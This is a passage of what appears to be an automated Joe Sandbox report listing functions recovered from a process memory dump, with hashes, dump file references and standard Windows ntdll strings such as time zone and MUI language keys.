                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                  Function 00DA1D80 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                  Function 00D9FD5C Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                  Function 00D9FED0 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                  Function 00D9FEA0 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                  Function 00D9FE24 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                  Function 00D9FFFC Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                  Function 00D9FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                  Function 00D9FF34 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                  • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                  • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                  • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                  Function 00DC8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • WindowsExcludedProcs, xrefs: 00DC87C1
                                  • Kernel-MUI-Number-Allowed, xrefs: 00DC87E6
                                  • Kernel-MUI-Language-Allowed, xrefs: 00DC8827
                                  • Kernel-MUI-Language-SKU, xrefs: 00DC89FC
                                  • Kernel-MUI-Language-Disallowed, xrefs: 00DC8914
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: _wcspbrk
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 402402107-258546922
                                  • Opcode ID: ccdb4ed6ecbc88dfd3dec2c04bce40dfc0da242940c4573a32560d53fbed11dc
                                  • Instruction ID: 08608e506cd0ef13c4770924ca70e0a8f57f3646f82980f8b8f59e793b62ba71
                                  • Opcode Fuzzy Hash: ccdb4ed6ecbc88dfd3dec2c04bce40dfc0da242940c4573a32560d53fbed11dc
                                  • Instruction Fuzzy Hash: 9EF1C4B2D0024AEFCF11EF95C981EEEB7B9FF08304F14446AE605A7211EB349A45DB61
                                  Function 00E3822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: _wcsnlen
                                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                  • API String ID: 3628947076-1387797911
                                  • Opcode ID: 4cb44f04a6b94d0e564951166813913a6f444a3d64728b5a41aac8809640d955
                                  • Instruction ID: 1a3761e84e1946cd51c89340bdb4c908afa0d2c2705205de124a0ecbcf649cfe
                                  • Opcode Fuzzy Hash: 4cb44f04a6b94d0e564951166813913a6f444a3d64728b5a41aac8809640d955
                                  • Instruction Fuzzy Hash: A6418176241309BEEB019AA0CE46FEE7BECAF04B44F105162BA04F6191DBB0DA54D7A4
                                  Function 00DE13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 50390ab0c9d42835c3b84f038dfa42f77ef0d84ddcf615b6d6b3062cb1e3cd8f
                                  • Instruction ID: 2fcf25499694774aaa9ed11d5855ea0b64aff4e0edf5b641453290be70652611
                                  • Opcode Fuzzy Hash: 50390ab0c9d42835c3b84f038dfa42f77ef0d84ddcf615b6d6b3062cb1e3cd8f
                                  • Instruction Fuzzy Hash: 8E613975A00695AACF34EF5AC8908BEBBB5EFD5300758C56EE4D657780D334AA80CB70
                                  Function 00E43B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: f821a1b73a0f65bd8a076c066c36c4f9322d7ac8e763674d2e6413b1adf0f1c2
                                  • Instruction ID: a26940f8f87dabcbd9dfd43c86eeebe0691eb2966028bdaf3ad84d714adb813d
                                  • Opcode Fuzzy Hash: f821a1b73a0f65bd8a076c066c36c4f9322d7ac8e763674d2e6413b1adf0f1c2
                                  • Instruction Fuzzy Hash: 4261C472900644AFCF20DFA9D8814BEBBF5EF54324B14D52AF8A9B7141E330EB409B60
                                  Function 00DD7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                  Download Yara Rule
                                  APIs
                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00DF3F12
                                  Strings
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00DFE2FB
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00DFE345
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00DF3F4A
                                  • ExecuteOptions, xrefs: 00DF3F04
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00DF3F75
                                  • Execute=1, xrefs: 00DF3F5E
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00DF3EC4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: BaseDataModuleQuery
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 3901378454-484625025
                                  • Opcode ID: 7068371b2b9b4896a927b8335dc924fc10a646f6b5d7df3ba0aca571fe5c92ee
                                  • Instruction ID: 22fe2b898c6b4cc4df12d57e6a60fb49b635231f796ed3eb16d2bd68d44bc122
                                  • Opcode Fuzzy Hash: 7068371b2b9b4896a927b8335dc924fc10a646f6b5d7df3ba0aca571fe5c92ee
                                  • Instruction Fuzzy Hash: A941E771A4020CBADF209BA4DC86FEA73BCEF15704F0504E9F605E6191EA709B498B70
                                  Function 00DE0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID: .$:$:
                                  • API String ID: 3965848254-2308638275
                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction ID: c5c6fef1ecab9cc88f730a0cbee049ba7e79489172377c175807d64b739f54fb
                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction Fuzzy Hash: B6A18D7190038ADBCB24EF66C8456BEBBB5FF05704F38856AD442A7281D7B09AC1CB71
                                  Function 00DE0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E02206
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-4236105082
                                  • Opcode ID: 52c4af4decb184aa6556c49e0b8dd88a291d91c1e8d195c2fc3aafd036f6e41a
                                  • Instruction ID: f2060148629e65f9b167802577cc03af531f7ababcf69d9aa55a10cfb67c2b9f
                                  • Opcode Fuzzy Hash: 52c4af4decb184aa6556c49e0b8dd88a291d91c1e8d195c2fc3aafd036f6e41a
                                  • Instruction Fuzzy Hash: A95139317012516FEB159A15CC86F6633E9DF94724F21922DFE48EB2C5DA71EC8187B0
                                  Function 00DE14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___swprintf_l.LIBCMT ref: 00E0EA22
                                    • Part of subcall function 00DE13CB: ___swprintf_l.LIBCMT ref: 00DE146B
                                    • Part of subcall function 00DE13CB: ___swprintf_l.LIBCMT ref: 00DE1490
                                  • ___swprintf_l.LIBCMT ref: 00DE156D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: ce06148deeed4d3e374c4068febc596898878c79e8a72ad4f38f12e706623df5
                                  • Instruction ID: 7f6e1cda143ef60a4165d24aeda110df83bc872da414448557ecab24cb1502a4
                                  • Opcode Fuzzy Hash: ce06148deeed4d3e374c4068febc596898878c79e8a72ad4f38f12e706623df5
                                  • Instruction Fuzzy Hash: 1D218176A00259ABCF20EE59CC41AEA73BCEB54700F544566F946E3240EB70DA988BF1
